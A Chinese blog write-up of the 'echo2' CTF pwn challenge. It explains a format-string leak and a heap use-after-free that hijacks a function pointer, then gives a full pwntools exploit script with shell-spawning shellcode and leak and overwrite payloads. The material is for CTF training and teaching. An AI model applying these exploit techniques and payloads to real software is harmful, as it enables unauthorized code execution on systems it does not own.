堆基础练习题 —— 1

最新推荐文章于 2022-09-06 14:54:30 发布
最新推荐文章于 2022-09-06 14:54:30 发布
阅读量204 收藏 2
点赞数
分类专栏: CTF训练 PWN Linux 文章标签: 安全 PWN linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125871075
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏

题目地址:请看pwn栈溢出基础练习题——1 ;放了本博客的所有练习题目
fmtstr_uaf

目录

题目分析

在这里插入图片描述
发现栈上基本没有什么保护,则很有可能有栈溢出漏洞和栈上执行shellcode漏洞
ida分析:
在这里插入图片描述
红线1表示在栈中开辟了连续的三块空间,v7为起始地址
红线2表示在堆中开辟了0x28大小的空间
红线3表示在栈的v7起始地址中写入24字符数据,v7起始三地址一共24字节,未发生溢出
红线4中,查看地址可以发现,三处地址连续,则表示func起始的三个地址块中放入了echo1-3个函数地址
下面循环则表示输入1-4,并执行相应的操作,看提示表示2出存在字符串漏洞,3存在堆UAF漏洞
在这里插入图片描述
红线5处函数将红线2处指针o申请的0x28大小空间释放掉,这里存在漏洞,后面会细致分析。
因此根据提示先进入echo2和echo3看下漏洞情况
echo2:
在这里插入图片描述
先执行(o+3)处函数,即greeting函数,再输入字符串,再printf()输出,最后执行(o+4)bybye函数
明显这里存在字符串漏洞,因此可以利用此字符串泄露栈上任意地址内容
echo3:
在这里插入图片描述
先执行(o+3)处函数,即greeting函数,再申请0x20空间,往空间中输入数据,puts()输出,最后执行(o+4)bybye函数
这里存在虽然free(s),但指针s并未被销毁,可因为s存在于echo3函数栈中,函数调用完成,s被销毁,因此这里s并不是堆的直接漏洞。
这时候就要分析了,最开始我们输入4选择退出时,o指向的地址空间(0x28)就被释放了,但程序会问我们是否真要退出,如果我们这是不退出,则o指针仍然存在,但o指向的地址空间被释放。此时o指向的地址空间再free chunk中,例如再fastbin中,此时我们在指向echo3函数,申请0x20空间,则被释放的0x28空间正好可以给0x20空间使用,则o和s其实指向了同一个空间,只是s只能操作0x20大小的数据而已,则我们可以通过此堆漏洞改变堆数据

解题思路

通过上述分析,我们可知s与o可以被指向同一个空间,并且在echo3中为s所指向空间的0x20大小输入数据,分析可知,0x20大小正好可以覆盖到(o+3),而(o+3)处正好为greeting函数地址,并且在echo2或者echo3时都会先调用(o+3)处地址的函数,则要是我们将(o+3)处地址改为shellcode函数地址,则可被引导直接去指向shellcode,则题目解析完成。那么只剩下一个问题shellcode如何构造,地址为多少??
分析程序可知,最最开始程序便让我们输入最多24字节的字符串存入到v7起始的地址中,那么我们可以将v7起始的地址空间直接写入24字节之内的shellcode,于是我们只需要找到v7地址即可,v7地址可以通过main函数的ebp-偏移量计算,通过ida或者调试可以知道v7偏移量为0x20,(最好看调试结果,ida有时候不靠谱)
在这里插入图片描述
那么我们该如何知道main函数ebp地址呢,远程肯定开了地址随机化,因此不能通过调试ebp地址作为ebp真实地址
这时候echo2函数中的字符串格式化漏洞则可以解决这个问题,echo2中的格式化漏洞可以泄露地址空间中任意地址内容,而栈调用中可以知道子函数的pre ebp地址内容则为母函数的ebp,于是可以通过泄露pre ebp的内容得到main函数的ebp地址,并且通过偏移计算shellcode的真实地址,而由于这是64位,并通过上图可知pre ebp地址在6+4个参数位置,即10

全部代码

from pwn import *

p=process("./echo2")
elf=ELF("./echo2")
# 将shellcode写入栈中
p.recvuntil(b"hey, what's your name? : ")
shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p.sendline(shellcode)

# 寻找shellcode真实地址
p.recvuntil(b"> ")
p.sendline(b"2")
payload=b"%10$p"+b"A"*3
p.sendline(payload)
p.recvuntil(b"0x")
shellcode_addr=int(p.recvuntil(b'AAA',drop=True),16)-0x20

# 先释放o指向堆空间
p.recvuntil(b"> ")
p.sendline(b"4")
p.recvuntil(b"to exit? (y/n)")
p.sendline(b"n")
# 利用UAF漏洞,执行shellcode
p.recvuntil(b"> ")
p.sendline(b"3")
# p.recvuntil(b"hello \n")
p.recv()
p.sendline(b"A"*24+p64(shellcode_addr))
p.interactive()
Mokapeng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [ZJCTF 2019]EasyHeap 记第一次入门
weixin_45441024的博客
12-27 616
BUUCTF [ZJCTF 2019]EasyHeap 记第一次入门 一般的都是这种表单形式的
数据结构与算法(24)——
小菜鸟入门
05-18 926
目:请说明有N个元素的的高度为logN 目:给定一个最大,查找最小元素
[入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1274
[BUUCTF] asis2016_b00ks 入门off-by-null 刚开始学pwn就听说,目很魔幻,需要大量的基础知识。在漫长地啃基础原理以后,这是我第一次自己研究学习并且完全明白原理的。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是中最为常见的菜单目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
UAF 实例-RHme3 CTF 的一道
hl1293348082的专栏
03-30 158
目来源: https://github.com/xerof4ks/heapwn/tree/master/rhme3 初步了解 目基本都是选择菜单,这里可以添加,删除,选择,编辑,展示球员,还可以显示队伍,功能看着很多啊 首先玩玩一下这个游戏,便于后期逆向一些数据结构 上面就是球员这个结构有什么信息,第一个 free slot 就相当于球员的 id,这个不用我们输入 remove 就删除咯 select 会输出球员的信息 edit 当前的 palyer,基于上面的
leetCode每日十---(难度:中等)
松落
09-02 819
目描述1 笔者解答1.1 class Solution { public int nthUglyNumber(int n) { int count=1; int num_result=1; while(count<n){ num_result++; int num=num_result; boolean getone=false; do {
计算机图形学——基于MFC三维图形开发 孔令德版
03-06
内含计算机图形学——基于MFC三维图形开发 孔令德版的课件以及第二章示例的完整源代码
计算机科学与工程领域——数据结构与算法的专著 C/C++数据结构算法
12-16
更为可贵的是,本书不仅仅介绍了理论知识,还提供了50多个应用实例及600多道练习题。 本书内容广博权威,结构清晰合理,是一本全新的有关数据结构与算法的教材,对广计算机科学与工程领域的从业人员也是一本很好的...
数据结构习答案(全部算法)严蔚敏版
11-18
第1章 绪论 1.1 数据结构的基本概念和术语 1.1.1 引言 1.1.2 数据结构有关概念及术语 1.1.3 数据结构和抽象数据类型(ADT) 1.2 算法描述与分析 1.2.1 什么是算法 1.2.2 算法描述工具——C语言 1.2.3 算法...
java面试笔试资料java笔试大集合及答案库java笔试汇总资料188个合集.zip
09-14
java面试笔试资料java笔试大集合及答案库java笔试汇总资料188个合集 100家大公司java笔试汇总.doc 125条常见的java 面试笔试大汇总.pdf 2011最新整理java经典代码.doc 25个经典的Spring面试问答.docx ...
《计算机操作系统教程》习详解(第二版)
11-20
所以,嵌入式操作系统一般采用微内核 ( micro kernel )结构,包括如下基本功能: (1)处理机调度;(2)基本内存管理;(3)通讯机制;(4)电源管理。在这些基本成分之上可进行扩展,以适应不同应用目标。
HITCON-Training lab10(uaf入门
像初雪一样自由洒落
03-08 716
目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个块,分别是存放两个函数指针的8字节块和存放内容的块 这个示意图很清楚: ...
pwnable.kr解之uaf
Yale的博客
06-19 567
前言: 这道目反应了uaf的基本原理,pwn入门必做的目,如果这一块了解的不够透彻,直接去打现在涉及各种奇技淫巧的pwn,肯定会被绕晕掉。所以为了照顾萌新(其实是我自己菜)把这道目单独拿出来写一下。 这是一道uaf目,把二进制文件拉到本地来研究 在分析前,先简单说一下c++的虚函数和uaf的前置知识 在c++中,如果类中有虚函数,那么这个类就会有一个虚函数表的指针vfptr,而子类会继承。 uaf的原理: 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释
pwnable(echo2)【64位格式化字符串&uaf
九层台
01-26 694
和echo1差不多都没开启任何保护,有一个格式化字符串漏洞 64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据) 64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9 这是执行printf时候的状态。 这个是输出的数据 0x1cd605f,0x7f81ace85790,0x70252...
[pwn] 9.利用基础
H4ppyD0g的博客
09-01 290
文章目录环境搭建first_fit(use after free)fastbin_dup_into_stack(double free) 环境搭建 git clone https://github.com/shellphish/how2heap.git first_fit(use after free) 源码 #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { fprintf(
echo和echo2的wp
一个码农的笔记
11-12 5645
https://hackme.inndy.tw/scoreboard/ 目很有趣,我做了rop和rop2这两个目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
pwntools中fmtstr的使用
fa1c4的blog
02-01 3618
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6521
文章目录0x00.看0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看 健身回来,继续刷第二,貌似和上一一个风格啊。连名字都差不多,偏工业实际。不过这一学到了一个新东西,fmtstr_payload. 目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
2022几款开源的态势感知、攻击监控、日志分析等平台调研
热门推荐
qq_41696518的博客
08-31 1万+
2022几款开源的态势感知、攻击监控、日志分析等平台调研
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2730
好家伙,保护全开,根据文件名,可以判断这是一道目,刷了这么久,终于遇到目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
Python练习题——coffee
最新发布
10-28
这是一道Python练习题,主要是关于咖啡的配料和占比的计算。代码中定义了一个列表,其中每个元素都是一个元组,元组的第一个元素是咖啡的名称,第二个元素是一个字典,表示该咖啡的配料和对应的量。代码中还定义了一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值